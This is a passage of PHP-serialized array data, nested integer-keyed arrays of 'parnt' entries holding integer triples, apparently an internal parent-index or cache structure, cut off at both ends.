1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}}i:19;a:4:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:12;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:20;a:2:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:21;a:3:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:22;a:6:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:23;a:2:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:24;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}}i:25;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:26;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:27;a:4:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:15;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:28;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:29;a:2:{i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}}i:30;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:31;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}}i:32;a:3:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:33;a:4:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}}i:34;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:35;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:36;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:37;a:3:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}}i:38;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:39;a:4:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:40;a:3:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:1;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:41;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:42;a:2:{i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:20;i:1;i:0;i:2;i:1;}}}i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:21;i:1;i:0;i:2;i:1;}}}}i:43;a:1:{i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:22;i:1;i:0;i:2;i:1;}}}}i:44;a:2:{i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:23;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:24;i:1;i:0;i:2;i:1;}}}}i:45;a:2:{i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:23;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:25;i:1;i:0;i:2;i:1;}}}}i:46;a:1:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}}i:47;a:15:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:23;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:27;i:1;i:0;i:2;i:1;}}}}i:48;a:4:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:28;i:1;i:0;i:2;i:1;}}}i:25;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:29;i:1;i:0;i:2;i:1;}}}i:26;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:27;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:49;a:1:{i:28;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:99;i:1;i:0;i:2;i:2;}}}}i:50;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:51;a:1:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:52;a:7:{i:30;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:31;i:1;i:0;i:2;i:1;}}}i:31;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:53;a:2:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}}i:54;a:1:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:34;i:1;i:0;i:2;i:1;}}}}i:55;a:1:{i:33;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:35;i:1;i:0;i:2;i:1;}}}}i:56;a:1:{i:23;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:36;i:1;i:0;i:2;i:1;}}}}i:57;a:1:{i:23;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:58;a:1:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:59;a:5:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:37;i:1;i:0;i:2;i:1;}}}i:19;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:38;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:39;i:1;i:0;i:2;i:2;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}i:36;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:42;i:1;i:0;i:2;i:1;}}}}i:60;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:43;i:1;i:0;i:2;i:1;}}}}i:61;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:44;i:1;i:0;i:2;i:1;}}}}i:62;a:4:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:45;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:46;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:63;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:64;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:47;i:1;i:0;i:2;i:1;}}}}i:65;a:1:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:48;i:1;i:0;i:2;i:1;}}}}i:66;a:1:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:49;i:1;i:0;i:2;i:1;}}}}i:67;a:2:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:68;a:1:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:69;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:70;a:1:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:71;a:1:{i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:51;i:1;i:0;i:2;i:1;}}}}i:72;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:73;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:74;a:10:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:52;i:1;i:0;i:2;i:1;}}}i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:53;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:54;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:75;a:1:{i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:56;i:1;i:0;i:2;i:1;}}}}i:76;a:2:{i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:57;i:1;i:0;i:2;i:1;}}}i:39;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:58;i:1;i:0;i:2;i:1;}}}}i:77;a:2:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:59;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:78;a:5:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:60;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:27;i:1;i:0;i:2;i:1;}}}}i:79;a:1:{i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:62;i:1;i:0;i:2;i:1;}}}}i:80;a:1:{i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:63;i:1;i:0;i:2;i:1;}}}}i:81;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:60;i:1;i:0;i:2;i:1;}}}}i:82;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:64;i:1;i:0;i:2;i:1;}}}}i:83;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:84;a:1:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:85;a:8:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:27;i:1;i:0;i:2;i:1;}}}i:43;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:65;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}}i:86;a:2:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:45;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:67;i:1;i:0;i:2;i:1;}}}}i:87;a:20:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:76;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:39;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:77;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:79;i:1;i:0;i:2;i:1;}}}}i:88;a:6:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:80;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:81;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:81;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:82;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:83;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:84;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:85;i:1;i:0;i:2;i:3;}}}}i:89;a:5:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:86;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:87;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:87;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:87;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:88;i:1;i:0;i:2;i:1;}}}}i:90;a:5:{i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:91;a:2:{i:52;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:89;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}}i:92;a:1:{i:52;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:93;a:5:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:94;a:4:{i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:91;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}}i:95;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:92;i:1;i:0;i:2;i:1;}}}}i:96;a:4:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2